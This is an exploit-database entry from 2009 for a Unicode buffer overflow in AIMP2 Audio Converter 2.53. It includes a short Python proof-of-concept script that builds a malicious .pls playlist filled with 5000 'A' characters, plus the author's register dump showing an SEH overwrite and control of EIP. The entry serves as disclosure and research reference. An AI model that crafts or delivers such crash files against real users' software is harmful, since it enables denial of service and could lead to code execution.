AIMP2 Audio Converter - exploit.company

vendor:

AIMP2 Audio Converter

by:

mr_me

7,5

CVSS

HIGH

Unicode overflow

N/A

CWE

Product Name: AIMP2 Audio Converter

Affected Version From: 2.53 (build 330)

Affected Version To: 2.53 (build 330)

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2009

AIMP2 Audio Converter <= 2.53 (build 330) (.pls/.m3u) Unicode local crash PoC

AIMP2 Audio Converter <= 2.53 (build 330) (.pls/.m3u) Unicode local crash PoC is a vulnerability that allows an attacker to overwrite SEH handler with a CALL EAX 0x00XX00XX instruction. This can lead to a crash breakdown with EAX 001B0020 UNICODE "AAAAAAAAAAAAAAAAAAAA~, ECX 00000273, EDX 00000C4C, EBX 00000000, ESP 0012DCA8, EBP 0012DD64, ESI 001B6610 UNICODE "AAAAAAAAAAAAAAAAAAAA~, EDI 00130000 ASCII "Actx " and EIP 004530C6 AIMP2.004530C6. When the exemption handler is passed to overwrite EIP, EIP 00410041.

Mitigation:

N/A

Source

Exploit-DB raw data:

#!/usr/bin/python
#
# ######################################################################
#
# AIMP2 Audio Converter <= 2.53 (build 330) (.pls/.m3u) Unicode local crash PoC
# Found & exploited by: mr_me
# Download: ftp://www.catode.ru/AIMP/aimp_2.51.330.zip
# Tested on: Wind0ws XP SP3
# 
# ######################################################################
#
# Unicode overflow, maybe someone with better skills can exploit this 
# you need to overwrite SEH handler with a CALL EAX 0x00XX00XX instruction.
# Here is the crash breakdown:
# 
# EAX 001B0020 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# ECX 00000273
# EDX 00000C4C
# EBX 00000000
# ESP 0012DCA8
# EBP 0012DD64
# ESI 001B6610 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# EDI 00130000 ASCII "Actx "
# EIP 004530C6 AIMP2.004530C6
#
# And then when we pass the exemption handler to overwrite EIP...
#
# EIP 00410041
#

header = ("[playlist]\nNumberOfEntries=3\n\n");
header += ("File1=");
crash = ("\x41" * 5000);

buffer = header + crash
file=open('mr_mes_funky.pls','w')
file.write(buffer)
file.close()
print "[+] mr_mes_funky.pls file created successfully"

# milw0rm.com [2009-09-01]